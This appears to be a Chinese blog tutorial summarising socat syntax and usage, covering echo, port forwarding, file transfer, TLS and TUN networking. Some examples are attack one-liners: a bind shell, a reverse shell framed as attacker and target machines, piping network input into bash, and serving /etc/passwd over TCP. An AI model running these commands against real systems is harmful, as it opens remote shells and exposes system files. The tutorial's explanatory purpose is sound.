Socat 命令总结

事以密成,语以泄败。


导航


介绍

Socat 是一个功能强大的网络工具(相当于是增强版 netcat),它可以在两个数据流之间建立通道,且支持的数据流类型非常丰富,例如:TCP、UDP、TUN、SOCKS 代理、UNIX 套接字、STDIO 标准输入输出流、PIPE 管道流、OPEN 文件流、EXEC/SHELL/SYSTEM 进程流、OPENSSl 加密流等。


基本语法

bash 复制代码
socat [OPTION] <ADDRESS_1>[,OPTS] <ADDRESS_2>[,OPTS]
  • ADDRESS_1ADDRESS_2 表示两个通信的端点,即数据流。
  • OPTION 用于设置全局选项,比如单向模式、调试模式、日志级别等。【注:单向模式中的 -u 表示左流向右,-U 表示右流向左,不加则表示双向模式。】
  • OPTS 用于设置数据流的选项(不同类型的数据流对应的选项亦有所区别),常用的选项是 fork、reuseaddr。

用法示例

1. 回显输入

bash 复制代码
socat - -	#STDIO STDIO

说明:在终端输入什么就输出什么。

2. 回显输入 over TCP/UDP

bash 复制代码
socat - tcp-listen:1234,fork 	#STDIO TCP	服务端监听1234端口
socat - tcp:127.0.0.1:1234		#STDIO TCP	客户端连接1234端口

socat - udp4-listen:1234,bind=192.168.56.20,fork	#STDIO UDP	服务端仅监听192.168.56.20接口的1234端口
socat - udp4:192.168.56.20:1234						#STDIO UDP	客户端连接1234端口

说明:客户端将输入的数据通过 tcp/udp 通道传输给服务端,而服务端又将接收的数据再传输给标准输出。

3. 正向连接 shell

bash 复制代码
socat tcp-listen:1234,fork exec:/bin/bash	#TCP EXEC	服务端监听1234端口
socat - tcp:127.0.0.1:1234					#STDIO TCP	客户端连接1234端口

说明:服务端将接收到的数据传输给 bash 进程,bash 处理之后将结果返回给客户端的标准输出。,

4. 反向连接 shell

bash 复制代码
socat - tcp-listen:1234,fork				#STDIO TCP	攻击机监听1234端口
socat EXEC:/bin/bash tcp:127.0.0.1:1234		#EXEC TCP	靶机连接1234端口
#socat - tcp:127.0.0.1:1234					#STDIO TCP	靶机连接1234端口

说明:攻击机将输入的数据传输给连接它的靶机,而靶机又将数据传递给了 bash 进程,经其处理之后返回结果到攻击机。【注意:如果有多个靶机同时连接攻击机,那么攻击机的输入会随机被传递给其中一个靶机,而不是同时传递给所有靶机。】

5. 端口转发

bash 复制代码
socat tcp-listen:1234,fork tcp:127.0.0.1:8080	#TCP TCP

说明:将本地监听端口 tcp/1234 接收的数据转发到本地的 tcp/8080 端口。【转发到远端亦行】

6. 网络服务

bash 复制代码
socat -U tcp-listen:1234,fork open:test.txt		#TCP OPEN

说明:将文件内容作为服务响应返回。【注意:此时最好使用-U单向模式(右向左),否则请求可能会覆盖文件内容。】

7. 文件传输

bash 复制代码
socat -U tcp-listen:1234,fork open:/etc/passwd				#TCP OPEN	发送端
socat -u tcp:127.0.0.1:1234 open:./passwd.txt,create		#TCP OPEN	接收端

说明:发送端将文件数据传输给连接到监听端口的接收端,接收端又将收到的数据打包到新文件中。【注意单向模式的使用】

8. 管道传输

bash 复制代码
echo ok | socat - tcp-listen:1234,fork	#PIPE TCP
#socat - tcp-listen:1234,fork | bash	#TCP PIPE

说明:(1)将 echo 输出的数据通过管道传递给连向监听端口的终端;(2)将监听端口接收到的数据传递给 bash 进程处理。

9. 加密传输

bash 复制代码
socat openssl-listen:8443,cert=ssl-cert.pem,key=ssl-cert.key,verify=0,fork tcp:127.0.0.1:8080	#OPENSSL TCP OPENSSL 服务端
#socat - openssl:127.0.0.1:8443,verify=0	#OPENSSL 客户端

#注:当服务端不是转发给 http 服务时,客户端需要此命令配合使用,示例截图中的 curl 命令拥有 openssl 客户端的功能故示例没有用到该命令。
#注:功能测试时,证书的生成可以使用 make-ssl-cert /usr/share/ssl-cert/ssleay.cnf ssl-cert 命令生成。

说明:监听 HTTPS 请求并将其转发到本地的 HTTP 服务。

10. TUN 网络

bash 复制代码
socat tcp-listen:1234,fork tun:192.168.1.1/24,up			#TCP TUN	服务端
socat tcp:192.168.56.20:1234 tun:192.168.1.2/24,up			#TCP TUN	客户端

说明:所有连接到 TUN 服务端的终端,全都接入了一个自建的 TUN 网络之中,从而实现了异地组网。【在 Linux 中测试是成功的,但是在 Windows 中测试是失败的。】


杂项

相关推荐
HeLLo_a11920 分钟前
第11章 安全网络架构和组件(一)
linux·服务器·网络
南川琼语27 分钟前
TCP概念+模拟tcp服务器及客户端
linux·服务器·网络·tcp/ip
安顾里5 小时前
Linux命令-iostat
linux·运维·服务器
100编程朱老师6 小时前
面试:什么叫Linux多路复用 ?
linux·运维·服务器
miracletiger6 小时前
uv 新的包管理工具总结
linux·人工智能·python
enyp806 小时前
麒麟系统(基于Ubuntu)上使用Qt编译时遇到“type_traits文件未找到”的错误
linux·qt·ubuntu
struggle20257 小时前
LinuxAgent开源程序是一款智能运维助手,通过接入 DeepSeek API 实现对 Linux 终端的自然语言控制,帮助用户更高效地进行系统运维工作
linux·运维·服务器·人工智能·自动化·deepseek
无敌小茶8 小时前
Linux学习笔记之动静态库
linux·笔记
程序员JerrySUN9 小时前
驱动开发硬核特训 · Day 21(上篇) 抽象理解 Linux 子系统:内核工程师的视角
java·linux·驱动开发
雨声不在9 小时前
debian切换用户
linux·服务器·debian